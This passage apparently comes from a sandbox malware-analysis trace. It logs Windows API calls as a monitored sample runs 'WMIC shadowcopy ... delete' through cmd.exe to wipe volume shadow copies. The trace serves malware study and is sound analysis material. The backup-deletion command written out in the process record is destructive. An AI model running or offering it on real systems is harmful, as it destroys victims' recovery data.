returned 0x0 [0098.338] IUnknown:Release (This=0x1f63d80) returned 0x0 [0098.338] malloc (_Size=0x800) returned 0x1dd080 [0098.338] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x1dd080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0098.338] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.338] malloc (_Size=0x20) returned 0x1dcef0 [0098.338] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x1dcef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0098.338] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff672ab0 [0098.338] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0098.339] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0098.339] free (_Block=0x1dcef0) [0098.339] free (_Block=0x1dd080) [0098.339] IEnumWbemClassObject:Next (in: This=0x1f63d18, lTimeout=-1, uCount=0x1, apObjects=0x10f410, puReturned=0x10f420 | out: apObjects=0x10f410*=0x0, puReturned=0x10f420*=0x0) returned 0x1 [0098.340] IUnknown:Release (This=0x1f63d18) returned 0x0 [0098.342] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.342] free (_Block=0x1dcca0) [0098.342] free (_Block=0x1dccc0) [0098.342] GetCurrentThreadId () returned 0xb38 [0098.342] ??0CHString@@QEAA@PEBG@Z () returned 0x10f5e8 [0098.342] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x10f5e8 [0098.342] lstrlenW (lpString="LIST") returned 4 [0098.342] lstrlenW (lpString="delete") returned 6 [0098.342] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0098.342] lstrlenW (lpString="ASSOC") returned 5 [0098.342] lstrlenW (lpString="delete") returned 6 [0098.342] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0098.342] lstrlenW (lpString="GET") returned 3 [0098.342] lstrlenW (lpString="delete") returned 6 [0098.342] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0098.346] ??1CHString@@QEAA@XZ () returned 0x2360301 [0098.346] WbemLocator:IUnknown:Release (This=0x1f63c18) returned 0x0 [0098.346] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0098.346] _kbhit () returned 0x0 [0098.347] free (_Block=0x1d6f20) [0098.347] free (_Block=0x1dcac0) [0098.347] free (_Block=0x1dcaa0) [0098.347] free (_Block=0x1dca80) [0098.347] free (_Block=0x1dca60) [0098.347] free (_Block=0x1d70a0) [0098.347] free (_Block=0x1dcb40) [0098.347] free (_Block=0x1d85c0) [0098.347] free (_Block=0x1dd020) [0098.347] free (_Block=0x1dcbc0) [0098.347] free (_Block=0x1dcfa0) [0098.347] free (_Block=0x1dcae0) [0098.347] free (_Block=0x1dcbe0) [0098.347] free (_Block=0x1d7140) [0098.347] free (_Block=0x1d6e00) [0098.347] free (_Block=0x1dcff0) [0098.347] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0098.347] free (_Block=0x1dce20) [0098.347] free (_Block=0x1dcb00) [0098.347] free (_Block=0x1dcb20) [0098.348] free (_Block=0x1dcf30) [0098.348] free (_Block=0x1dcb60) [0098.348] free (_Block=0x1d7ee0) [0098.348] free (_Block=0x1d7f30) [0098.348] free (_Block=0x1d7f80) [0098.348] free (_Block=0x1dcb80) [0098.348] free (_Block=0x1d6a20) [0098.348] free (_Block=0x1d6de0) [0098.348] free (_Block=0x1d8040) [0098.348] free (_Block=0x1d6dc0) [0098.348] free (_Block=0x1d8000) [0098.348] free (_Block=0x1d6d60) [0098.348] free (_Block=0x1d6d80) [0098.348] free (_Block=0x1d6c40) [0098.348] free (_Block=0x1d6c60) [0098.348] free (_Block=0x1d6be0) [0098.348] free (_Block=0x1d6c00) [0098.348] free (_Block=0x1d6ca0) [0098.348] free (_Block=0x1d6cc0) [0098.348] free (_Block=0x1d6d00) [0098.348] free (_Block=0x1d6d20) [0098.349] free (_Block=0x1d6b20) [0098.349] free (_Block=0x1d6b40) [0098.349] free (_Block=0x1d6ac0) [0098.349] free (_Block=0x1d6ae0) [0098.349] free (_Block=0x1d6b80) [0098.349] free (_Block=0x1d6ba0) [0098.349] free (_Block=0x1d6a60) [0098.349] free (_Block=0x1d6a80) [0098.349] free (_Block=0x1d69d0) [0098.349] free (_Block=0x1d69a0) [0098.349] free (_Block=0x1d6e90) [0098.349] WbemLocator:IUnknown:Release (This=0x1f51390) returned 0x2 [0098.349] WbemLocator:IUnknown:Release (This=0x1f63b28) returned 0x0 [0098.349] WbemLocator:IUnknown:Release (This=0x1f63a98) returned 0x0 [0098.350] WbemLocator:IUnknown:Release (This=0x1f51390) returned 0x1 [0098.350] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0098.350] WbemLocator:IUnknown:Release (This=0x1f51390) returned 0x0 [0098.350] free (_Block=0x1dc9e0) [0098.350] free (_Block=0x1dca00) [0098.350] free (_Block=0x1d8540) [0098.350] free (_Block=0x1dca20) [0098.350] free (_Block=0x1dca40) [0098.350] free (_Block=0x1d8580) [0098.350] free (_Block=0x1dc860) [0098.350] free (_Block=0x1dc880) [0098.350] free (_Block=0x1d83c0) [0098.351] free (_Block=0x1dc8a0) [0098.351] free (_Block=0x1dc8c0) [0098.351] free (_Block=0x1d8400) [0098.351] free (_Block=0x1dc7e0) [0098.351] free (_Block=0x1dc800) [0098.351] free (_Block=0x1d8340) [0098.351] free (_Block=0x1dc820) [0098.351] free (_Block=0x1dc840) [0098.351] free (_Block=0x1d8380) [0098.351] free (_Block=0x1dc960) [0098.351] free (_Block=0x1dc980) [0098.351] free (_Block=0x1d84c0) [0098.351] free (_Block=0x1dc9a0) [0098.351] free (_Block=0x1dc9c0) [0098.351] free (_Block=0x1d8500) [0098.351] free (_Block=0x1dc760) [0098.351] free (_Block=0x1dc780) [0098.352] free (_Block=0x1d82c0) [0098.352] free (_Block=0x1dc7a0) [0098.352] free (_Block=0x1dc7c0) [0098.352] free (_Block=0x1d8300) [0098.352] free (_Block=0x1dc8e0) [0098.352] free (_Block=0x1dc900) [0098.352] free (_Block=0x1d8440) [0098.352] free (_Block=0x1dc920) [0098.352] free (_Block=0x1dc940) [0098.352] free (_Block=0x1d8480) [0098.352] free (_Block=0x1dc6a0) [0098.352] free (_Block=0x1dc6c0) [0098.352] free (_Block=0x1d8200) [0098.352] free (_Block=0x1dc560) [0098.352] free (_Block=0x1dc580) [0098.352] free (_Block=0x1d80c0) [0098.352] free (_Block=0x1d6e50) [0098.352] free (_Block=0x1d6e70) [0098.352] free (_Block=0x1d8080) [0098.352] free (_Block=0x1dc5e0) [0098.353] free (_Block=0x1dc600) [0098.353] free (_Block=0x1d8140) [0098.353] free (_Block=0x1dc6e0) [0098.353] free (_Block=0x1dc700) [0098.353] free (_Block=0x1d8240) [0098.353] free (_Block=0x1dc5a0) [0098.353] free (_Block=0x1dc5c0) [0098.353] free (_Block=0x1d8100) [0098.353] free (_Block=0x1dc620) [0098.353] free (_Block=0x1dc640) [0098.353] free (_Block=0x1d8180) [0098.353] free (_Block=0x1dc660) [0098.353] free (_Block=0x1dc680) [0098.353] free (_Block=0x1d81c0) [0098.353] free (_Block=0x1dc720) [0098.353] free (_Block=0x1dc740) [0098.354] free (_Block=0x1d8280) [0098.354] CoUninitialize () [0098.377] exit (_Code=0) [0098.377] free (_Block=0x1dcd30) [0098.377] free (_Block=0x1d7ea0) [0098.377] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.377] free (_Block=0x1d6f40) [0098.377] free (_Block=0x1d6a40) [0098.377] free (_Block=0x1d7e60) [0098.377] free (_Block=0x1d7e20) [0098.378] free (_Block=0x1d7dd0) [0098.378] free (_Block=0x1d7d90) [0098.378] free (_Block=0x1d7d30) [0098.378] free (_Block=0x1d5a90) [0098.378] free (_Block=0x1d5a50) [0098.378] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.378] free (_Block=0x1dcec0) Thread: id = 152 os_tid = 0x6c0 Thread: id = 153 os_tid = 0x7ec Thread: id = 154 os_tid = 0x7d0 Thread: id = 155 os_tid = 0x97c Thread: id = 156 os_tid = 0x9ac Process: id = "22" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0xb0f4000" os_pid = "0x644" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 157 os_tid = 0xa90 [0098.479] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfd70 | out: lpSystemTimeAsFileTime=0x1cfd70*(dwLowDateTime=0x4248ec70, dwHighDateTime=0x1d68245)) [0098.479] GetCurrentProcessId () returned 0x644 [0098.479] GetCurrentThreadId () returned 0xa90 [0098.479] GetTickCount () returned 0x114e560 [0098.479] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfd78 | out: lpPerformanceCount=0x1cfd78*=21837231332) returned 1 [0098.482] GetModuleHandleW (lpModuleName=0x0) returned 0x4aae0000 [0098.482] __set_app_type (_Type=0x1) [0098.482] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab07810) returned 0x0 [0098.482] __getmainargs (in: _Argc=0x4ab2a608, _Argv=0x4ab2a618, _Env=0x4ab2a610, _DoWildCard=0, _StartInfo=0x4ab0e0f4 | out: _Argc=0x4ab2a608, _Argv=0x4ab2a618, _Env=0x4ab2a610) returned 0 [0098.482] GetCurrentThreadId () returned 0xa90 [0098.482] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa90) returned 0x3c [0098.482] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0098.482] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0098.482] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0098.483] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.483] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfd08 | out: phkResult=0x1cfd08*=0x0) returned 0x2 [0098.483] VirtualQuery (in: lpAddress=0x1cfcf0, lpBuffer=0x1cfc70, dwLength=0x30 | out: lpBuffer=0x1cfc70*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0098.483] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc70, dwLength=0x30 | out: lpBuffer=0x1cfc70*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0098.483] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc70, dwLength=0x30 | out: lpBuffer=0x1cfc70*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0098.483] VirtualQuery (in: lpAddress=0xd4000, lpBuffer=0x1cfc70, dwLength=0x30 | out: lpBuffer=0x1cfc70*(BaseAddress=0xd4000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0098.483] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc70, dwLength=0x30 | out: lpBuffer=0x1cfc70*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30 [0098.483] GetConsoleOutputCP () returned 0x1b5 [0098.483] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab1bfe0 | out: lpCPInfo=0x4ab1bfe0) returned 1 [0098.484] SetConsoleCtrlHandler (HandlerRoutine=0x4ab03184, Add=1) returned 1 [0098.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.484] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0098.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.484] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab0e194 | out: lpMode=0x4ab0e194) returned 1 [0098.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.484] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0098.484] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.484] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab0e198 | out: lpMode=0x4ab0e198) returned 1 [0098.484] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.484] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0098.485] GetEnvironmentStringsW () returned 0x258b90* [0098.485] GetProcessHeap () returned 0x240000 [0098.485] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xa7c) returned 0x259620 [0098.485] FreeEnvironmentStringsW (penv=0x258b90) returned 1 [0098.485] GetProcessHeap () returned 0x240000 [0098.485] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8) returned 0x258a10 [0098.485] GetEnvironmentStringsW () returned 0x258b90* [0098.485] GetProcessHeap () returned 0x240000 [0098.485] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xa7c) returned 0x25a0b0 [0098.485] FreeEnvironmentStringsW (penv=0x258b90) returned 1 [0098.485] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebc8 | out: phkResult=0x1cebc8*=0x44) returned 0x0 [0098.485] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x0, lpData=0x1cebe0*=0x18, lpcbData=0x1cebc4*=0x1000) returned 0x2 [0098.485] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x4, lpData=0x1cebe0*=0x1, lpcbData=0x1cebc4*=0x4) returned 0x0 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x0, lpData=0x1cebe0*=0x1, lpcbData=0x1cebc4*=0x1000) returned 0x2 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x4, lpData=0x1cebe0*=0x0, lpcbData=0x1cebc4*=0x4) returned 0x0 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x4, lpData=0x1cebe0*=0x40, lpcbData=0x1cebc4*=0x4) returned 0x0 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x4, lpData=0x1cebe0*=0x40, lpcbData=0x1cebc4*=0x4) returned 0x0 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x0, lpData=0x1cebe0*=0x40, lpcbData=0x1cebc4*=0x1000) returned 0x2 [0098.486] RegCloseKey (hKey=0x44) returned 0x0 [0098.486] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebc8 | out: phkResult=0x1cebc8*=0x44) returned 0x0 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x0, lpData=0x1cebe0*=0x40, lpcbData=0x1cebc4*=0x1000) returned 0x2 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x4, lpData=0x1cebe0*=0x1, lpcbData=0x1cebc4*=0x4) returned 0x0 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x0, lpData=0x1cebe0*=0x1, lpcbData=0x1cebc4*=0x1000) returned 0x2 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x4, lpData=0x1cebe0*=0x0, lpcbData=0x1cebc4*=0x4) returned 0x0 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x4, lpData=0x1cebe0*=0x9, lpcbData=0x1cebc4*=0x4) returned 0x0 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x4, lpData=0x1cebe0*=0x9, lpcbData=0x1cebc4*=0x4) returned 0x0 [0098.486] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebc0, lpData=0x1cebe0, lpcbData=0x1cebc4*=0x1000 | out: lpType=0x1cebc0*=0x0, lpData=0x1cebe0*=0x9, lpcbData=0x1cebc4*=0x1000) returned 0x2 [0098.486] RegCloseKey (hKey=0x44) returned 0x0 [0098.486] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517447 [0098.486] srand (_Seed=0x5f517447) [0098.486] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete" [0098.486] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete" [0098.487] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab1c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0098.487] GetProcessHeap () returned 0x240000 [0098.487] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x218) returned 0x25ab40 [0098.487] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x25ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0098.487] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab0f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.487] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab0f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.487] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab0f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0098.487] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0098.487] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0098.487] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0098.487] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0098.487] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0098.487] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0098.487] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0098.487] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0098.487] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0098.487] GetProcessHeap () returned 0x240000 [0098.487] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x259620 | out: hHeap=0x240000) returned 1 [0098.487] GetEnvironmentStringsW () returned 0x258b90* [0098.487] GetProcessHeap () returned 0x240000 [0098.487] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xa94) returned 0x25ad60 [0098.488] FreeEnvironmentStringsW (penv=0x258b90) returned 1 [0098.488] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab0f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.488] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab0f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0098.488] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0098.488] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0098.488] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0098.488] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0098.488] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0098.488] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0098.488] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0098.488] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0098.488] GetProcessHeap () returned 0x240000 [0098.488] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x5c) returned 0x25b800 [0098.488] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf9d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0098.488] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf9d0, lpFilePart=0x1cf9b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf9b0*="Desktop") returned 0x25 [0098.488] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0098.488] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf6e0 | out: lpFindFileData=0x1cf6e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x25b870 [0098.488] FindClose (in: hFindFile=0x25b870 | out: hFindFile=0x25b870) returned 1 [0098.488] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1cf6e0 | out: lpFindFileData=0x1cf6e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x25b870 [0098.489] FindClose (in: hFindFile=0x25b870 | out: hFindFile=0x25b870) returned 1 [0098.489] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0098.489] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1cf6e0 | out: lpFindFileData=0x1cf6e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x25b870 [0098.489] FindClose (in: hFindFile=0x25b870 | out: hFindFile=0x25b870) returned 1 [0098.489] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0098.489] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0098.489] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0098.489] GetProcessHeap () returned 0x240000 [0098.489] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25ad60 | out: hHeap=0x240000) returned 1 [0098.489] GetEnvironmentStringsW () returned 0x25b870* [0098.489] GetProcessHeap () returned 0x240000 [0098.489] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xae8) returned 0x25c360 [0098.489] FreeEnvironmentStringsW (penv=0x25b870) returned 1 [0098.489] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab1c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0098.489] GetProcessHeap () returned 0x240000 [0098.489] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25b800 | out: hHeap=0x240000) returned 1 [0098.489] GetProcessHeap () returned 0x240000 [0098.489] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4016) returned 0x25ce50 [0098.490] GetProcessHeap () returned 0x240000 [0098.490] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe4) returned 0x259680 [0098.490] GetProcessHeap () returned 0x240000 [0098.490] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25ce50 | out: hHeap=0x240000) returned 1 [0098.490] GetConsoleOutputCP () returned 0x1b5 [0098.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab1bfe0 | out: lpCPInfo=0x4ab1bfe0) returned 1 [0098.490] GetUserDefaultLCID () returned 0x409 [0098.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab17b50, cchData=8 | out: 